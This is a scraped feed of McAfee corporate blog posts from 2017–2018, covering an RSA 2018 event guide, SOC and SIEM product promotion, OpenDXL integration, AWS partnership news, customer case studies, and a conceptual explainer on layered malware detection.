What can we learn from the Underwear Bomber and the rule of 3-1-1? Chief Executive Officer Chris Young delivers his sixth RSA keynote Tuesday, April 17th by applying lessons learned fighting terror in the air. “Smart security changed air travel from top to bottom. We need to bring a cybersecurity paradigm shift that is more collaborative, clear and accessible.” Young said of his keynote. Find out what cybersecurity can learn from those that keep air travel the safest form of transportation, bar none. April 17th, 8:55-9:20 a.m., Moscone West, Level 3.

Sessions: Fighting ransomware and nurturing innovation

Christiaan Beek and Raj Samani of the McAfee Advanced Threat Research team uncover the dark world of pseudo-ransomware, where demands for payment mask the devastation of wiper files, and extortion dances with destruction as the world watches. “The purpose of pseudo-ransomware is typically destruction but we have seen evidence of its use as a diversionary tactic, and whilst it may appear as traditional ransomware the attackers are unlikely to provide any decryption capability regardless whether the ransom is paid. Either way, with actual ransomware or the decoy tactic, organizations need guidance to mitigate the risk.” Samani said of his session. Get the point of view of a ransomware hacker as the walls close in during a major campaign takedown. Reserve your seat now for April 16th, 3:35 p.m. (Session code: SEM-M03).

CISO Grant Bourzikas and Chief Human Resources Officer Chatelle Lynch join forces to explain how innovation can help companies retain top talent. “Recruiting and retaining a diverse talent pool in cybersecurity today is so competitive,” Lynch said of her session. “Employees want to know they are at a company that strives for the latest innovation.” Learn how engaging employees (including games!) can make the most of every staff. April 17, 1-1:45 p.m. (Session Code: SPO1-T07).

Expo Hall: Look for McAfee and McAfee Skyhigh

McAfee acquired Skyhigh Networks early this year, adding state-of-the-art cloud security to our existing portfolio. Look for both McAfee and Skyhigh at RSA:

  • McAfee Booth #N3801 (North Hall)
  • McAfee Skyhigh Booth #S1301 (South Hall)

Follow the floor decals between our two booths in the Expo Halls.

McAfee Skyhigh bowling at hipster hangout!

In a private event on Tuesday evening, April 17th, McAfee and our partners will host a full buy-out networking event at the cool boutique bowling alley Mission Bowling in San Francisco’s edgy Mission District neighborhood. This is a private event targeted at security professionals who want to network with their peers and strike up conversations on everything cloud-related, sparing no one but staying out of the gutter. The event will have a hosted bar, raffle, gourmet food, and giveaways. Request an Invite for the April 17th evening event and learn more about McAfee Skyhigh’s RSA events.

More information on the RSA conference here.

The post A Guide to McAfee at RSA 2018 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/guide-mcafee-rsa-2018/feed/ 0
Is Your SOC Caught in the Slow Lane? https://securingtomorrow.mcafee.com/business/soc-caught-slow-lane/ https://securingtomorrow.mcafee.com/business/soc-caught-slow-lane/#respond Tue, 27 Mar 2018 04:02:13 +0000 https://securingtomorrow.mcafee.com/?p=87914 This blog was written by Jason Rolleston. Everybody’s got a device. And the data on that device is moving into the public cloud. Massive amounts of data.  In a world of massive amounts of data, who’s the traffic cop? The Security Operation Center (SOC). But these days the daily flow of data traffic resembles a […]

The post Is Your SOC Caught in the Slow Lane? appeared first on McAfee Blogs.

]]>
This blog was written by Jason Rolleston.

Everybody’s got a device. And the data on that device is moving into the public cloud. Massive amounts of data.  In a world of massive amounts of data, who’s the traffic cop? The Security Operation Center (SOC).

But these days the daily flow of data traffic resembles a Formula One race car going full out, and some traffic monitors are a single cop on the beat.

Research shows this analogy is not far off: 25% of security events go unanalyzed. And 39% of cybersecurity organizations manually collect, process, and analyze external intelligence feeds.

Think about this. At the dawn of the Digital Century, more than a third of all companies are approaching cybersecurity manually.

This is not sustainable.

In short, there are simply not enough people to keep up with the security challenges. But it’s not a question of training or hiring more people. The idea is for humans to do less and machines to do more. Automating threat defense has many advantages: speed, the ability to learn, and the ability to collaborate with other solutions. Integration of data, analytics, and machine learning are the foundations of the advanced SOC.

For about a year now McAfee engineers have been developing a new architecture for an existing SIEM tool called McAfee© Enterprise Security Manager version 11 (“McAfee ESM 11”), which can serve as the foundation of a modern SOC.

As cybercriminals get smarter, the need for SOC operations to evolve becomes more important. McAfee ESM 11 can help customers transition their SOC from silos of isolated data and manual investigations to faster operations based on machine learning and behavioral analytics.

What makes ESM 11 different from other SIEM tools is its flexible architecture and scalability.

The open and scalable data bus architecture at the heart of McAfee ESM 11 shares huge volumes of raw, parsed and correlated events to allow threat hunters to easily search recent events, while reliably retaining and storing data for compliance and forensics.

The scalability of McAfee ESM 11 architecture allows for flexible horizontal expansion with high availability, giving organizations the ability to rapidly query billions of events. Additional McAfee ESM appliances or virtual machines can be added at any point to add ingestion, query performance, and redundancy.

ESM 11 also includes the ability to partner. An extensible and distributed design integrates with more than three dozen partners, hundreds of standardized data sources, and industry threat intelligence.

By deploying advanced analytics to quickly elevate key insights and context, analysts and members of a security team tasked with examining cyberthreats can focus their attention on high-value next tasks, like understanding a threat’s impact across the organization and what’s needed to respond.

This human-machine teaming, enabled by McAfee’s new and enhanced security operations solutions like McAfee Investigator, McAfee Behavioral Analytics, and McAfee Advanced Threat Defense, allows organizations to more efficiently collect, enrich and share data, turn security events into actionable insights and act to confidently detect and correct sophisticated threats faster. The strategy was outlined in my last SOC blog.

We’ve been testing these products together at the new McAfee Security Fusion Centers, located in Plano, Texas and Cork, Ireland. These facilities were built last year and are designed to support full visibility and global management of risks, in a simulated environment. The Security Fusion Centers give customers a blueprint for building out their own SOCs.

In short – we are revving up the SOC: critical facts in minutes, not hours. Highly-tuned appliances to collect, process, and correlate log events from multiple years with other data streams, including STIX-based threat intelligence feeds. And the storage of billions of events and flows, with quick access long-term event data storage to investigate attacks.

Let your security travel as fast as your data. And get your SOC out of the slow lane.

The post Is Your SOC Caught in the Slow Lane? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/soc-caught-slow-lane/feed/ 0
The Need for Cybersecurity Products, and Companies, to Talk to Each Other https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/need-cybersecurity-products-companies-talk/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/need-cybersecurity-products-companies-talk/#respond Fri, 09 Mar 2018 16:00:08 +0000 https://securingtomorrow.mcafee.com/?p=85235 This blog post was written by Raja Patel. There are a lot of cyberthreats out there. And some may take comfort that there are 1,300 cybersecurity software firms battling against them. That might seem like a lot, but in the face of thousands of online dangers, it’s a battle that’s not always won. Most of […]

The post The Need for Cybersecurity Products, and Companies, to Talk to Each Other appeared first on McAfee Blogs.

]]>
This blog post was written by Raja Patel.

There are a lot of cyberthreats out there. And some may take comfort that there are 1,300 cybersecurity software firms battling against them. That might seem like a lot, but in the face of thousands of online dangers, it’s a battle that’s not always won. Most of these cybersecurity organizations are, in fact, taking on the challenge in relative vacuums, each trying to solve the same problems in different ways. This essentially creates separate battlefields, versus operating together in this overwhelming cyber war.

We know there is a need to reduce complexity, especially given the struggle to get enough IT security expertise and headcount, and users complain it’s difficult to get multiple products working together and maintaining those integrations. In fact, 67%1 of customer respondents indicate that analytics and operations investments are being impaired because of too many point solutions, instead of using an integrated platform. So it’s important to take a closer look at how cybersecurity firms work, and work together.

This is the challenge that led McAfee to create the “Data Exchange Layer” (DXL) in 2014. The idea is simple: companies collaborate in an information/intelligence exchange. The DXL communication fabric connects and optimizes security actions across multiple vendor products, as well as internally developed and open-source solutions. Enterprises gain secure, near real-time access to new data and instant interactions with other products.

As of today, the DXL ecosystem has more than a dozen participants, including Aruba, Check Point, Cisco, Huawei, Interset, SAS, and Titus. And in the past six months alone 24 companies have begun the process to join, including IBM Security, Juniper, and VM Ware.

Open DXL

The DXL concept got a big boost in 2016, when McAfee announced it would open the DXL source code to developers (the “Open DXL” initiative). OpenDXL helps developers and enterprises freely leverage DXL, giving the “keys to the kingdom” to 1,500 software developers to date. That’s an additional 1,500 software developers fighting for everyone’s safety.

The OpenDXL.com website is the focal point for the OpenDXL community and allows developers to imagine, discover, build, deploy, or discuss services for the DXL communications fabric. The goal is to empower DXL integrations, provide a catalog of available apps, and nurture new ideas.

The OpenDXL initiative has shown increasing adoption, with 57 community-built integrations on opendxl.com to date. Solutions are aided via a software developer kit (SDK), published to the GitHub source code repository and OpenDXL.com. Through the OpenDXL initiative, integration and orchestration are now extended to open-source and enterprise applications.

Joining with Cisco

DXL continues to evolve with a robust platform to arm for cybersecurity warfare. In late 2017 McAfee and Cisco began a joint integration between DXL and Cisco’s own messaging fabric, PxGrid, creating the industry’s largest threat protection integration (100 partners) ecosystem.

Industry and enterprise leaders have long called for greater visibility and efficacy in security operations. Cisco pxGrid and DXL interoperability mark the first time this has been achieved at such scale. Together this joint system provides customers with visibility and real-time security orchestration, sharing information between the network and the endpoint. Bi-directional data flow enriches integrated applications with detailed information, allowing analysts visibility into critical data such as what is on their network, current security posture, privilege levels, and more. With the two fabrics interoperating, organizations can now drive integrations with security solutions from hundreds of vendors.

McAfee teams also contributed several new projects to OpenDXL.com, including a Docker-based development environment that gets people up and running in five minutes. Companies such as MGM and AT&T have embraced the concept. Today DXL has over 3,000 customers and seven million installed clients with automated processes that can cross previously siloed tools. This allows users to efficiently and effectively manage threats by linking endpoint, network and security operation domains to close security gaps.

The Future

It may not surprise people that there is a shortage of developers in the cybersecurity industry. And as the digital world grows into new fields like artificial intelligence, and the Internet of Things puts cybersecurity squarely into our homes, the threats will also grow. We must work together as an industry.

This is just the beginning of an important movement. We are at a crossroads. We need to challenge our own beliefs.

We must empower security teams to stop spending their time on tedious integrations and manual tasks, and instead focus on defending against adversaries. Organizations should look to maximize the value of their environment with solutions that integrate. Layering new technologies that don’t speak to each other only creates gaps that adversaries can exploit. Collaboration throughout the security industry is critical to closing information gaps, breaking silos and providing the visibility we need to protect our most important assets from cybercriminals.

In short, we need to talk to each other. And the tools we develop need to talk to each other, and work together.

Are your tools open to talk?

 

1McAfee ePO study, 2018

The post The Need for Cybersecurity Products, and Companies, to Talk to Each Other appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/need-cybersecurity-products-companies-talk/feed/ 0
A New Standard for Security at New Standard Corporation https://securingtomorrow.mcafee.com/business/new-standard-security-new-standard-corporation/ https://securingtomorrow.mcafee.com/business/new-standard-security-new-standard-corporation/#respond Mon, 05 Feb 2018 18:30:14 +0000 https://securingtomorrow.mcafee.com/?p=84244 From the latches on the toolbox in your garage to componentry in gigantic earth movers, New Standard Corporation provides Original Equipment Manufacturer components, assemblies, and related services for products used in the agriculture, construction, mining, industrial, and power generation industries. As at companies everywhere, New Standard has seen information security move from the back shelf […]

The post A New Standard for Security at New Standard Corporation appeared first on McAfee Blogs.

]]>
From the latches on the toolbox in your garage to componentry in gigantic earth movers, New Standard Corporation provides Original Equipment Manufacturer components, assemblies, and related services for products used in the agriculture, construction, mining, industrial, and power generation industries. As at companies everywhere, New Standard has seen information security move from the back shelf to the boardroom in recent years.

New Standard Network Administrator Chad Johnson has experienced the shift firsthand. “Years ago, I would never hear from the C-suite or a VP about whether we are doing enough to secure our data, prevent loss, and prevent hacking,” attests Johnson, who oversees all facets of networking, infrastructure, and telephony at the company’s three manufacturing facilities in Pennsylvania and North Carolina. “The Equifax breach definitely helped raise awareness.”

New Standard Corporation has built a reputation of trust and reliability with major OEMs across multiple industries, so cybersecurity is crucially important to the company. The company’s approach to collaborative engineering and custom OEM manufacturing enables it to offer industry-leading solutions, while taking every measure to ensure complete confidentiality.

That approach has led the company to invest in security infrastructure. New Standard has relied on McAfee® endpoint protection for more than a decade, and recently migrated to McAfee Endpoint Security. The company also added McAfee Web Gateway appliances and McAfee Threat Intelligence Exchange,. As a result, Johnson’s day-to-day activities and approach to security have evolved significantly. “Prior to implementing McAfee Endpoint Security and McAfee Web Gateway, our security was essentially event-driven and reactive,” explains Johnson. “We just waited to be notified of an infection on an endpoint.”

“With McAfee Web Gateway filtering at the edge for malware, suspicious content, and web reputation, and with McAfee Endpoint Security and McAfee Threat Intelligence Exchange sharing threat information back and forth, we have become much more proactive,” continues Johnson. “We’re now automatically examining file reputation on all endpoints and cross-referencing unknown files with the McAfee GTI cloud. The number of threats that make it to the endpoint has plummeted, as has the amount of time we spend remediating infected systems.”

Managing Security by Exception

“I manage by exception now,” says Johnson, who looks at the McAfee ePolicy Orchestrator® (McAfee ePO™) central console about an hour each day. “I still look at reports daily, and occasionally validate that all the automated responses we’ve put in place with McAfee are working… but incident response has been fantastic. Today most of my time in McAfee ePO is proactive—for instance, looking for file anomalies or potentially suspicious behavior.”

Johnson particularly appreciates the modular architecture of the McAfee Endpoint Security framework introduced last year. “I love the module approach, where you can deploy specific pieces and leverage only what you want,” says Johnson. “Modularity lets us more easily modify our security profile over time. With this platform, we are looking to add a lot of additional functionality and security for our desktop and mobile users.”

With the switch from reactive to more proactive security, New Standard has felt more comfortable embracing bring-your-own-device policies for employees. “We have a lot more peace of mind now regarding users working outside the firewall and on their own devices,” says Johnson.

Looking to the Cloud and Beyond

Looking forward, Johnson is most excited about the company’s upcoming deployment of McAfee Advanced Threat Defense (McAfee ATD) sandboxing appliances and integration with McAfee Threat Intelligence Exchange across all endpoints. “Given what I’ve seen [in our testing] so far, I believe McAfee ATD will dramatically reduce our potential risk for a zero-day outbreak,” says Johnson.

Extending endpoint security to the Cloud and leveraging OpenDXL are also on New Standard’s security roadmap. After attending MPOWER, the McAfee user conference in October in Las Vegas, Johnson left excited about the direction McAfee is taking its endpoint security platform and how it is working with other security vendors to mitigate threats for its customers.

For Johnson, the dynamic nature of his job is one of the reasons he keeps coming back to work each day. “You’re always going to be learning in the technology industry,” he says. “It changes year over year,” he says. So, even when the toolbox latch or manufacturing component looks the same as it did the previous year, the security behind them keeps evolving. So does McAfee.

Please watch our video of Chad Johnson talking about his experience with McAfee below. Get your questions answered by tweeting @McAfee_Business.

The post A New Standard for Security at New Standard Corporation appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-standard-security-new-standard-corporation/feed/ 0
A Leader-Class SOC: The Sky’s the Limit https://securingtomorrow.mcafee.com/business/security-operations/leader-class-soc-skys-limit/ https://securingtomorrow.mcafee.com/business/security-operations/leader-class-soc-skys-limit/#respond Wed, 06 Dec 2017 19:44:17 +0000 https://securingtomorrow.mcafee.com/?p=82956 This blog was written by Jason Rolleston. This has been quite a year for McAfee, as we not only roll out our vision, but also start to fulfill that vision. We’ve established our world view: endpoint and cloud as the critical control points for cybersecurity and the Security Operations Center (SOC) as the central analytics […]

The post A Leader-Class SOC: The Sky’s the Limit appeared first on McAfee Blogs.

]]>
This blog was written by Jason Rolleston.

This has been quite a year for McAfee, as we not only roll out our vision, but also start to fulfill that vision.

We’ve established our world view: endpoint and cloud as the critical control points for cybersecurity and the Security Operations Center (SOC) as the central analytics hub and situation room. While we’ve talked a lot about endpoint and cloud over the past year, we’ve only recently started exposing our thinking and our innovation in the SOC, and I would like to delve a bit deeper.

SOCs provide dedicated resources for incident detection, investigation, and response. For much of the past decade, the SOC has revolved around a single tool, the Security Incident and Event Manager (or SIEM). The SIEM was used to collect and retain log data, to correlate events and generate alerts, to monitor, to report, to investigate, and to respond. In many ways, the SIEM has been the SOC.

However, in the past couple of years, we’ve seen extensive innovation in the security operations center. This innovation is being fueled by an industry-wide acceptance of the increased importance of security operations, powerful technical innovations (analytics, machine learning), and the ever-evolving security landscape. The old ways of doing things are no longer sufficient to handle increasingly sophisticated attacks. We need do something different.

McAfee believes this next generation SOC will be modular, open, and content-driven.

And automated. Integration of data, analytics, and machine learning are the foundations of the advanced SOC.

The reason for this is simple: increased volume.  In the last two years, companies polled in a McAfee survey said the amount of data they collect to support cybersecurity activities has increased substantially (28%) or somewhat (49%). There are important clues in all that data, but the new and different attacks get lost in the noise. Individual alerts are not especially meaningful – patterns, context, and correlations are required to determine potential importance, and these constructs require analytics – at high speed and sophistication, with a model for perpetually remaining up-to-date as threat actors and patterns change. We need the machines to do more of the work, freeing the humans to understand business-specific patterns, design efficient processes, and manage the policies that protect each organization’s risk posture.

SIEM remains a crucial part of the SOC. The use cases for SIEM are extensive and fundamental to SOC success: data ingestion, parsing, threat monitoring, threat analysis, and incident response. The McAfee SIEM is especially effective at high performance correlations and real-time monitoring that are now mainstream for security operations. We are pleased to announce that McAfee has been recognized for the seventh consecutive time as a leader in the Gartner Magic Quadrant for Security Information and Event Management.* And we’re not stopping there — we’re continuing to evolve our SIEM with a high volume, open data pipeline that enables companies to collect more data without breaking the bank.

An advanced SOC builds on a SIEM to further optimize analytics, integrating data, and process elements of infrastructure to facilitate identification, interpretation, and automation. A modular and open architecture helps SOC teams add in the advanced analytics and inspection elements that take SOCs efficiently from initial alert triage through to scoping and active response.

Over the past year, we’ve worked extensively partnering with over eight UEBA vendors to drive integration with our SIEM. At our recent customer conference in Las Vegas, MPOWER, we announced our partnership with Interset to deliver McAfee Behavioral Analytics. Look for more information about that in the new year. I also want to reinforce our commitment to being open and working with the broader ecosystem in this space, even as we bring an offer to market. No one has a monopoly on good ideas and good math – we’ve got to work together. Together is Power.

We also launched McAfee Investigator at MPOWER, a net new offering that takes alerts from a SIEM and uses data from endpoints and other sources to discover key insights for SOC analysts at machine speed. Leveraging machine learning and artificial intelligence, McAfee Investigator helps analysts get to high quality and accurate answers, fast.

The initial response is great: we’ve seen early adopter customers experience a 5-16x increase in
analyst investigation efficiency. Investigations that took hours are taking minutes. Investigations that took days are taking hours. Customers are excited and so are we!

In short – we have a lot cooking in the SOC and we are just getting started.

Look for continued fulfillment of McAfee’s vision in 2018. The sky’s the limit.

Cheers,

Jason

 

*Gartner Magic Quadrant for Security Information and Event Management, Kelly M. Kavanagh, Toby Bussa, 4 December 2017. From 2015-16, McAfee was listed as Intel Security, and in 2011, McAfee was listed as Nitro Security since it acquired the company in 2011.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post A Leader-Class SOC: The Sky’s the Limit appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/leader-class-soc-skys-limit/feed/ 0
McAfee and Amazon Web Services: A Secure Relationship https://securingtomorrow.mcafee.com/business/mcafee-amazon-web-services-secure-relationship/ https://securingtomorrow.mcafee.com/business/mcafee-amazon-web-services-secure-relationship/#respond Fri, 17 Nov 2017 22:00:03 +0000 https://securingtomorrow.mcafee.com/?p=82499 This blog post was written by Raja Patel. As enterprises continue their journey to the cloud, many are using a hybrid model that engages both the private and public cloud.  McAfee has embraced this “hybrid cloud” strategy to enable companies to migrate to the public cloud, and we are investing in the tools and relationships […]

The post McAfee and Amazon Web Services: A Secure Relationship appeared first on McAfee Blogs.

]]>
This blog post was written by Raja Patel.

As enterprises continue their journey to the cloud, many are using a hybrid model that engages both the private and public cloud.  McAfee has embraced this “hybrid cloud” strategy to enable companies to migrate to the public cloud, and we are investing in the tools and relationships to enable the transition. Working with Amazon Web Services (AWS) is an important part of bringing enterprise-level security to public cloud deployments, and I’m happy to announce two new partner relationships with AWS. Also, McAfee will be joining AWS at the AWS re:Invent Expo in Las Vegas in late November, where we will demonstrate products that customers can use in their hybrid cloud strategy.

McAfee is Now an APN Advanced Technology Partner

For enterprise engagements, McAfee has become an Amazon Partner Network (APN) Advanced Technology Partner. To become an APN Advanced Technology Partner we have demonstrated that our products, customer relationships, expertise and overall business investments on AWS have grown and are meaningful to AWS.

McAfee builds tools that automate the rollout of security controls and security operations consistently across organizations. Our solutions — such as Virtual Network Security Platform, Cloud Workload Security, and Web Gateway — can play significant roles in helping companies adopt AWS securely:

McAfee Virtual Network Security Platform (vNSP): Designed specifically for fully virtualized public and private clouds, vNSP delivers an elastic security control that provides comprehensive network inline intrusion prevention, application protection, zero-day threat detection and visibility into lateral attack movement. The scalable and highly distributed architecture has been certified as “Well Architected” by Amazon. Integration with orchestration and automation frameworks makes this an ideal solution for adoption in DevSecOps environments.

McAfee Cloud Workload Security (CWS): As data center parameters get redefined, the ability to navigate current datacenter workload assets and plot the journey to the cloud requires a map that will safely show the way. Cloud Workload Security provides visibility and protection for your workloads in the cloud with agility and confidence through an integrated suite of security technologies, ensuring control of new parameters.

McAfee Web Gateway (MWG): With its best-in-class malware protection efficacy and policy flexibility, we now have the ability to deploy MWG directly in AWS. This is in addition to the appliance model and SaaS deployment model. MWG boasts the most flexible options in the industry for Web security. With an AWS deployment, customers can not only offload workload from on-premise appliances through hybrid policy enforcement, they can also provide advanced in-line malware detection for SaaS-based apps. This is the same value proposition that McAfee has historically offered for endpoint protection, but we are now able to offer it for SaaS-based applications as well.

To learn more about our solutions that keep you better protected on AWS, visit  mcafee.com/ProtectAWS

McAfee Accepted into the AWS Public Sector Partner Program

In addition to the commercial sector, McAfee knows that Government, Education and Nonprofit customers need quality security in the cloud. AWS has accepted McAfee into its AWS Public Sector Partner Program. This designation reflects McAfee’s strong commitment to support public sector customers in their transition to the cloud. As our presence in the AWS Public Sector Partner Program grows, so too will the value of our solutions specifically targeted for the public sector.

McAfee is a Sponsor at AWS re:Invent

Join us the week of November 27th at the AWS re:Invent event in Las Vegas. Visit the McAfee (Booth 1238) at the Venetian. McAfee experts will share strategies and best practices to help customers secure and manage data on AWS. Plus, you can see live how McAfee vNSP expands network protection across virtualized environments.

Make sure to stop by the booth to say hello in person, or via Twitter.

To find out more about our programs, certifications, qualifications, and technologies supporting AWS, click here.

Cheers,

The post McAfee and Amazon Web Services: A Secure Relationship appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-amazon-web-services-secure-relationship/feed/ 0
When it Comes to Malware, Actions Can Speak Louder than Words https://securingtomorrow.mcafee.com/business/malware-actions-speak-louder-than-words/ https://securingtomorrow.mcafee.com/business/malware-actions-speak-louder-than-words/#respond Fri, 17 Nov 2017 21:00:59 +0000 https://securingtomorrow.mcafee.com/?p=82472 This blog post was written by Raja Patel. At some point as a child, a parent likely told you, “actions speak louder than words.” It’s a good life lesson—and it can hold just as true when fighting malware. Cybercriminals have become extremely skilled at disguising the true nature of malware attacks. The best way to […]

The post When it Comes to Malware, Actions Can Speak Louder than Words appeared first on McAfee Blogs.

]]>
This blog post was written by Raja Patel.

At some point as a child, a parent likely told you, “actions speak louder than words.” It’s a good life lesson—and it can hold just as true when fighting malware.

Cybercriminals have become extremely skilled at disguising the true nature of malware attacks. The best way to protect your users is to employ a layered approach that includes both pre- and post-execution analysis. You can learn a lot by evaluating what an unknown file “says” it is. But sometimes, the only way to stop advanced malware is to observe what it does once it crosses your threshold.

Journey through the Anti-Malware Funnel

To understand how pre- and post-execution anti-malware tools work together, imagine you’re running a grocery store and you have a problem with shoplifters. The thieves look just like other customers. How do you tell the good shoppers from the bad? Organizations are tasked with solving a similar problem in protecting against malware disguised to look like harmless application traffic.

Legacy signature-based antivirus plays an early role, filtering out large numbers of known attacks. Going to our grocery store analogy, this is like denying entry to all shoppers who’ve been caught before, who have their picture hanging on the wall of the manager’s office. It’s an important security measure, but it won’t stop thieves you’ve never seen before or those in disguise who no longer look the same.

At the next level of the funnel, McAfee Real Protect pre-execution scanning applies sophisticated statistical analysis and machine learning techniques to unknown “greyware” files. These scans compare static code attributes (source code language or complier used, linked DLLs, and other static features) against known threats, without signatures. Returning to our analogy, this is comparable to, say, facial recognition software that catches anyone entering the store with a criminal record of shoplifting, even if they’ve never been there before.

Static scanning catches a huge amount of malware, even if it’s well disguised. But as we know, cybercriminals don’t just give up when new defenses emerge. They develop new techniques (like packing, polymorphism, and metamorphism) to slip past them. (In our analogy, these would be the savviest shoplifters who, for example, dress up like a vendor making deliveries, or get someone with a clean record to shoplift for them.) To stop threats like these, you sometimes have to go deeper: watching what the greyware actually does.

Analyzing Malware Actions

McAfee offers two post-execution tools to catch the most cleverly disguised malware—the kind that makes it past even advanced pre-execution scanning. These are:

  • Real Protect Dynamic: This layer uses machine learning to analyze the file’s actual behavior as it executes. If the file attempts to do things that malware often does, such as create child processes, drop or alter files, or reach out to known bad networks, Real Protect can convict it as malicious in seconds.
  • Dynamic Application Containment: While other parts of the anti-malware funnel attempt to analyze and understand greyware, this layer takes a “contain first, limit the impact approach.” Based on the context and reputation of the greyware, Dynamic Application Containment (DAC) makes a determination to limit or eliminate its ability to make malicious changes on the endpoint. The threshold for triggering DAC is fully configurable. Once DAC is triggered, McAfee Endpoint Security uses Arbitrary Access Control (AAC) technology to isolate the execution profile of a process. It then detects any potentially malicious behavior, such as access violations, memory scanning, signs of persistence, proxy attacks on legitimate applications, etc. If the parent process violates any of the containment rules, DAC as a protective component blocks and/or reports on the actions that the malware had attempted to perform, preventing a “patient-zero” infection. The entire analysis is performed without having to configure any blacklists or whitelists, and without having to detonate the file in an execution sandbox.

In our hypothetical grocery store, post-execution tools are the equivalent of having a surveillance team watching every inch of the premises and stepping in the moment someone tries to steal or demonstrates a sufficient level of suspicious behavior to summon the attention of store security. You’re not necessarily preventing every shoplifter from entering the store, but you’re ensuring that they can’t do much damage once inside.

Multi-Layered Defense

If it sounds like there’s a tradeoff here, there is. Pre-execution scanning can prevent most malware from ever executing on endpoints—but it may miss some advanced attacks. Post-execution tools stop malicious behavior before it causes significant damage—but the file does execute on the system before they take action.

Neither method, on its own, will stop every attack or peel away every obfuscation technique. But working together as part of a multi-layered defense strategy, they provide powerful protection against the most sophisticated malware threats.

Like our hypothetical store, preventing threats is no longer about posting pictures and hoping someone spots a thief, it’s about ensuring that the tools to spot the would-be criminals you have yet to identify are in place. The good news is that with McAfee endpoint defenses, it’s possible to see more, stop more and do less thanks to tightly integrated defenses with a single management console.

Learn More

McAfee can help you detect and respond to advanced threats more quickly, with less time and effort. Learn more about our Dynamic Endpoint Threat Defense solution and follow us on Twitter at @McAfee.

 

The post When it Comes to Malware, Actions Can Speak Louder than Words appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/malware-actions-speak-louder-than-words/feed/ 0
Securing Victoria’s Secret’s Secrets — Defending Data and Operations to Support Global Fashion Brands https://securingtomorrow.mcafee.com/business/securing-victoria-secrets-secrets-defending-data-operations-support-global-fashion-brands/ https://securingtomorrow.mcafee.com/business/securing-victoria-secrets-secrets-defending-data-operations-support-global-fashion-brands/#respond Fri, 17 Nov 2017 15:00:29 +0000 https://securingtomorrow.mcafee.com/?p=82444 You’ve probably heard of Victoria’s Secret. And Calvin Klein, Gap, Lands’ End, Marks & Spencer, and Tommy Hilfiger. But you may have never heard of Brandix, one of the largest apparel suppliers to these and other top retail fashion brands. Sri Lanka’s largest apparel exporter, the Brandix Group employs approximately 48,000 people across 42 sites […]

The post Securing Victoria’s Secret’s Secrets — Defending Data and Operations to Support Global Fashion Brands appeared first on McAfee Blogs.

]]>
You’ve probably heard of Victoria’s Secret. And Calvin Klein, Gap, Lands’ End, Marks & Spencer, and Tommy Hilfiger. But you may have never heard of Brandix, one of the largest apparel suppliers to these and other top retail fashion brands. Sri Lanka’s largest apparel exporter, the Brandix Group employs approximately 48,000 people across 42 sites in Sri Lanka, India, Bangladesh, and the Dominican Republic.

In the global apparel industry, Brandix’s reputation as a top supplier of quality clothing has been rising rapidly along with its export volume. For the past five years, Brandix has been lauded as Sri Lanka’s Exporter of the Year (by the Sri Lankan Export Development Board). This surge in recognition has led to rapid growth, and with it, additional security risk.

“With the success and growth of our business, we knew we needed to take information security to the next level,” says Manager of Microsoft Technologies Janaka Sampath who oversees endpoint protection across the extended Brandix enterprise. Management concurred and even mandated bolstering cyber defenses, but desired to keep the information security team small.

So that was Janaka’s challenge: How could he pull together multiple security tools such as endpoint solutions with machine learning and detailed threat analytics in a security operations center run by a small team?

Tempted by Newer Endpoint Solutions but Won Over by McAfee

Although Brandix had used McAfee® antivirus solutions to protect endpoints for  years, the newer endpoint protection products began to catch Janaka’s attention because they do not rely on signatures for detection. After a thorough evaluation, however, he concluded that sticking with McAfee for endpoint protection still made the most sense given that McAfee recently introduced McAfee Endpoint Security. In Janaka’s mind, the new solution was a tremendous leap forward in endpoint protection, one that “goes well beyond signature-based detection.” The addition of Dynamic Application Containment (DAC) functionality and Real Protect machine learning technology, in particular, helped sway the decision.

Without its users even noticing, Brandix seamlessly migrated the antivirus engine of the McAfee Complete Endpoint Protection Advanced suite—McAfee VirusScan® Enterprise—to the McAfee Complete Endpoint Threat Protection Suite. The company also deployed the Adaptive Threat Prevention module option, which provides DAC and Real Protect. Janaka is first running DAC in “productivity mode,” fine-tuning and teaching it to avoid false positives before moving to “balance mode.” Implementation of Real Protect will follow. The impact of DAC and Real Protect has been impressive in the company’s tests using malware and greyware samples and mutations of samples. “In our simulations, McAfee Endpoint Security has detected and blocked ransomware and zero-day threats very effectively,” says Janaka.

Integrated Security Framework Boosts Security to Next Level

In addition to McAfee Endpoint Security, Brandix decided to implement McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense (McAfee ATD) to take advantage of each solution’s integration via the Data Exchange Layer (DXL), an open-source platform that connects security components for real-time data exchange without requiring point-to-point API connections. Now when a Brandix endpoint encounters a suspicious or malicious file, that information is immediately conveyed to McAfee Threat Intelligence Exchange, which compares it to its reputation database, and, if no match is found, immediately sends it to McAfee ATD for analysis. If McAfee ATD concludes the file is malicious, that information is instantly shared with all systems in the environment connected via DXL—including all other endpoints.

“Aggregating and sharing threat intelligence that has been gathered at various levels from a range of sources significantly enhances our security posture,” explains Janaka. “With McAfee Threat Intelligence Exchange and our integrated security platform, we can respond to threats much more quickly and mitigate risk more effectively. For instance, if a user attempts to download, knowingly or unknowingly, a file that violates our security policy or causes suspicious activity detected by McAfee Endpoint Security, we can immediately blacklist the file and prevent it from executing anywhere in our highly distributed environment.”

Improved Security Without a Huge Hassle or Increased Operational Overhead

